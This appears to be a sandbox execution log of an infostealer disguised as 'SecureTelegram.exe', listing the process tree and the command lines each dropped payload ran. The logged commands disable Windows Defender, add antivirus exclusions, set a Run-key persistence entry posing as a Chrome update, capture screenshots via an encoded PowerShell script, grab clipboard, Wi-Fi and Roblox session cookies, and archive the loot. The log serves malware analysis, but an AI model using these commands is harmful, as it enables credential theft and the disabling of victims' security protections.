C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2804

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2840

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3388

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3556
- C:\Users\Admin\AppData\Local\Temp\SecureTelegram.exe
  "C:\Users\Admin\AppData\Local\Temp\SecureTelegram.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1396
- - C:\Users\Admin\AppData\Local\Temp\SecureTelegram.exe
    "C:\Users\Admin\AppData\Local\Temp\SecureTelegram.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI13962\Build.exe -pbeznogym
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2216
    - - C:\Users\Admin\AppData\Local\Temp\_MEI13962\Build.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI13962\Build.exe -pbeznogym
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4952
      - C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1896
        
        C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI18962\s.exe -pbeznogym
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\_MEI18962\s.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI18962\s.exe -pbeznogym
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4176
        
        C:\ProgramData\main.exe
        
        "C:\ProgramData\main.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3364
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpC65D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpC65D.tmp.bat
        11⤵
        
        PID:5456
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 3364"
        12⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5520
        
        C:\Windows\system32\find.exe
        
        find ":"
        12⤵
        
        PID:5524
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        12⤵
        Delays execution with timeout.exe
        
        PID:5568
        
        C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5700
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        13⤵
        
        PID:4912
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        14⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2124
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2408
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of WriteProcessMemory
        
        PID:4204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:4680
        
        C:\ProgramData\setup.exe
        
        "C:\ProgramData\setup.exe"
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        
        PID:2912
      - C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3272
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1776
        
        C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Get Fucked Discord ID thegodcai', 0, 'You Got Shit On SKID', 48+16);close()""
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4504
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:5808
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Get Fucked Discord ID thegodcai', 0, 'You Got Shit On SKID', 48+16);close()"
        9⤵
        
        PID:3032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:5888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:5632
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:5776
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:5864
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:6196
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        8⤵
        
        PID:6216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        8⤵
        
        PID:6364
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        9⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        8⤵
        
        PID:6572
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        9⤵
        Gathers system information
        
        PID:7060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:6588
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        8⤵
        
        PID:6728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7096
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ejaj4dm1\ejaj4dm1.cmdline"
        10⤵
        
        PID:2896
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE6E.tmp" "c:\Users\Admin\AppData\Local\Temp\ejaj4dm1\CSC76FCC56F49A84DFBB4599DE0D5EEEAB.TMP"
        11⤵
        
        PID:1608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:1064
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:1392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:3760
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:3988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:464
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:3376
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:3380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:4880
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:2384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:4012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:5212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        8⤵
        
        PID:5588
        
        C:\Windows\system32\getmac.exe
        
        getmac
        9⤵
        
        PID:5612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32722\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\tlHDf.zip" *"
        8⤵
        
        PID:5932
        
        C:\Users\Admin\AppData\Local\Temp\_MEI32722\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI32722\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\tlHDf.zip" *
        9⤵
        Executes dropped EXE
        
        PID:5956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        8⤵
        
        PID:5732
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        8⤵
        
        PID:6096
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        9⤵
        
        PID:5856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        
        PID:6448
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        
        PID:6768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        8⤵
        
        PID:6836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        
        PID:6856
        
        C:\Windows\system32\cmd.exe
        
